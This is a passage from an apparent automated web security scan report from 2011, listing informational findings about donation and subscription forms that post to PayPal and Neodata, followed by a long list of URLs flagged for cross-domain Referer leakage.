...[SNIP]...
</p>
   <form action="https://www.paypal.com/cgi-bin/webscr" method="post">
       <fieldset>
...[SNIP]...

19.17. http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.joomlacommunity.eu
Path:	/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
no_shipping
no_note
currency_code
amount
submit

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:07 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f2b89666f144681ba17ab9a0996f50e0=fc830a5138c7cd5b8f7f3fa60df9a70c; path=/
Last-Modified: Mon, 24 Jan 2011 16:01:12 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 64750

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script src="http://www.jo
...[SNIP]...
<div class="moduletablemoduletable-doneer">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="hidden" name="cmd" value="_donations"/>
...[SNIP]...

19.18. http://www.jt.gen.tr/makaleler/46-joomla-16.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jt.gen.tr
Path:	/makaleler/46-joomla-16.html

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
encrypted
submit

Request

GET /makaleler/46-joomla-16.html HTTP/1.1
Host: www.jt.gen.tr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.19. http://www.littlewebthings.com/projects/countdown/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.littlewebthings.com
Path:	/projects/countdown/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
encrypted
submit

Request

GET /projects/countdown/ HTTP/1.1
Host: www.littlewebthings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:07:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13208
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<l
...[SNIP]...
<div class="donation_link">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

19.20. http://www.littlewebthings.com/projects/countdown/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.littlewebthings.com
Path:	/projects/countdown/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
encrypted
submit

Request

GET /projects/countdown/ HTTP/1.1
Host: www.littlewebthings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.21. http://www.littlewebthings.com/projects/countdown/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.littlewebthings.com
Path:	/projects/countdown/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
encrypted
submit

Request

GET /projects/countdown/ HTTP/1.1
Host: www.littlewebthings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.22. http://www.netlingo.com/advertise/payments.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.netlingo.com
Path:	/advertise/payments.php

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
submit
encrypted

Request

GET /advertise/payments.php HTTP/1.1
Host: www.netlingo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:59:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Connection: close
Content-Type: text/html
Content-Length: 35380

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<ti
...[SNIP]...
</h2>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post"> <input name="cmd" type="hidden" value="_s-xclick" />
...[SNIP]...

19.23. http://www.ossp.org/pkg/tool/lmtp2nntp/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ossp.org
Path:	/pkg/tool/lmtp2nntp/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
item_number
no_shipping
cn
submit

Request

GET /pkg/tool/lmtp2nntp/ HTTP/1.1
Host: www.ossp.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.24. http://www.outdoorphotographer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outdoorphotographer.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.neodata.com. The form contains the following fields:

Magazine
ItemCode
SourceCode
OrderType
iResponse
FullName
StreetAdr
SuppAdr
City
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
PostalCode
EmailAdr
submit

Request

GET / HTTP/1.1
Host: www.outdoorphotographer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.25. http://www.outdoorphotographer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outdoorphotographer.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.neodata.com. The form contains the following fields:

Magazine
ItemCode
SourceCode
OrderType
iResponse
FullName
StreetAdr
SuppAdr
City
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
PostalCode
EmailAdr
submit

Request

GET / HTTP/1.1
Host: www.outdoorphotographer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.26. http://www.outdoorphotographer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.outdoorphotographer.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.neodata.com. The form contains the following fields:

Magazine
ItemCode
SourceCode
OrderType
iResponse
FullName
StreetAdr
SuppAdr
City
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
State
PostalCode
EmailAdr
submit

Request

GET / HTTP/1.1
Host: www.outdoorphotographer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.27. http://www.playshakespeare.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.playshakespeare.com
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
hosted_button_id
submit

Request

GET / HTTP/1.1
Host: www.playshakespeare.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: eab80364d83027bfc601e73262603d25=341187f485832c9a1355235ffc880801; path=/
Last-Modified: Mon, 24 Jan 2011 15:15:14 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 180908

<?xml version="1.0"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns=
...[SNIP]...
</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick"/>
...[SNIP]...

19.28. http://www.sailinganarchy.com/advertise.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sailinganarchy.com
Path:	/advertise.htm

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

cmd
business
item_name
item_number
no_shipping
return
cancel_return
no_note
currency_code
lc
bn
submit

Request

GET /advertise.htm HTTP/1.1
Host: www.sailinganarchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:28:41 GMT
Server: Apache
Last-Modified: Mon, 18 Jan 2010 21:56:20 GMT
ETag: "21dc76-3008-6c654900"
Accept-Ranges: bytes
Content-Length: 12296
Vary: User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</p>
<form action="https://www.paypal.com/cgi-bin/webscr" method="post">
<center>
...[SNIP]...

20. Cross-domain Referer leakage previous next
There are 719 instances of this issue:

http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91
http://ad.doubleclick.net/adi/N5875.270604.B3/B5111946.91
http://ad.doubleclick.net/adi/N6061.194450.CDN.TURN.COM/B4419610.3
http://ad.doubleclick.net/adj/N3753.autotrader.com/B4276010.21
http://ad.turn.com/server/ads.js
http://ad.turn.com/server/ads.js
http://ads.pointroll.com/PortalServe/
http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/1274126425/Right1/TOLMedia/House-TOL-Sky/smtol-120x600.jpg/72634857383030396f616f4141783156
http://ads.traderonline.com/RealMedia/ads/click_lx.ads/www.traderonline.com/traderonline/L33/486817688/Right1/TOLMedia/House-TOL-Sky/atol-120x600.jpg/72634857383030396f616f4141783156
http://ads.tweetmeme.com/serve.js
http://ads.tweetmeme.com/serve.js
http://ads.tweetmeme.com/serve.js
http://adserver.teracent.net/tase/ad
http://adserver.teracent.net/tase/ad
http://autotrader.dealix.com/step1.asp
https://billing.cloudaccess.net/cart.php
https://billing.cloudaccess.net/submitticket.php
http://blogsearch.google.com/
http://books.google.com/bkshp
https://bugzilla.mozilla.org/show_bug.cgi
http://cdn.apture.com/media/app.khtml.js
http://cdn.w55c.net/i/0Rw6qcLcmo_34070076.html
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://cms.ad.yieldmanager.net/v1/cms
http://content.worldnow.com/global/tools/video/WNVideoCodebase_v2.js
http://d1.openx.org/afr.php
http://d1.openx.org/afr.php
http://demo.joomla.org/index.php
http://demo16.cloudaccess.net/administrator/index.php
http://disqus.com/forums/integrations/twitter/tweetbox.html
http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23
http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23
http://docs.google.com/viewer
http://docs.joomla.org/index.php
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://forum.joomla.org/ucp.php
http://forum.joomla.org/viewforum.php
http://forum.joomla.org/viewtopic.php
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://groups.google.com/groups
http://groups.google.com/grphp
http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=Nexternal.com/Joomla-Shopping-Cart&adT=Joomla+Compatible+Cart&adU=www.lynda.com&adT=Joomla+Tutorials&gl=US/x26amp
http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.Tenrox.com/Free_Demo&adT=Online+Project+Management&adU=www.eSpatial.com/Free-Trial&adT=Geographic+Information&gl=US/x26amp
http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.safepeak.com&adT=ImageAd&gl=US/x26amp
http://joomlacode.org/gf/&hl=en&client=ca-pub-1189370408998555&adU=www.sysaid.com&adT=ImageAd&gl=US/x26amp
http://joomlacode.org/gf/account/
http://joomlacode.org/gf/project/
http://joomlacode.org/gf/project/com_joodater/news/
http://joomlacode.org/gf/project/feedgator/frs/
http://joomlacode.org/gf/project/feedgator/news/
http://joomlacode.org/gf/project/imgttfmenu/news/
http://joomlacode.org/gf/project/joomla/frs/
http://joomlacode.org/gf/project/joomla/reporting/
http://joomlacode.org/gf/project/joomla/scmsvn/
http://joomlacode.org/gf/project/joomla/tracker/
http://joomlacode.org/gf/project/mambot_google1/news/
http://joomlacode.org/gf/project/opengallery/news/
http://joomlacode.org/gf/search/
http://jqueryui.com/themeroller/
http://linkhelp.clients.google.com/tbproxy/lh/fixurl
http://loadus.exelator.com/load/
http://loadus.exelator.com/load/net.php
http://maps.google.com/maps
http://maps.google.com/maps
http://maps.google.com/maps
http://maps.google.com/maps
http://maps.google.com/maps/place
http://maps.google.com/maps/place
http://maps.google.com/maps/place
http://media.fastclick.net/w/pg
http://media.fastclick.net/w/pg
http://media.fastclick.net/w/win.bid
http://network4g.verizonwireless.com/
http://news.google.com/news/story
http://news.google.com/news/story
http://news.google.com/news/story
http://news.google.com/news/story
http://news.google.com/nwshp
http://news.google.com/nwshp
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1002926843/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006372113/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020162530/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020927039/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1020942407/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1027505259/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/103412299/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/106070212/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1075149581/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1088639060/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1100718932/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102181256/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1102373340/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1107774700/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108472325/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1114198701/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1121605500/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1137419713/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/113792961/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1138258938/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/114076315/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1146188754/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1155840941/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1161264624/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1167313603/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1185005715/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1191108965/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1194667517/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1202068108/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121005439/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/121567099/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1216542950/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1217329464/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1220615232/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221387526/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1221668830/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1223978837/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230436896/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1230527888/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1239223334/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1243591587/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1244517244/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279
http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1247076543/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279
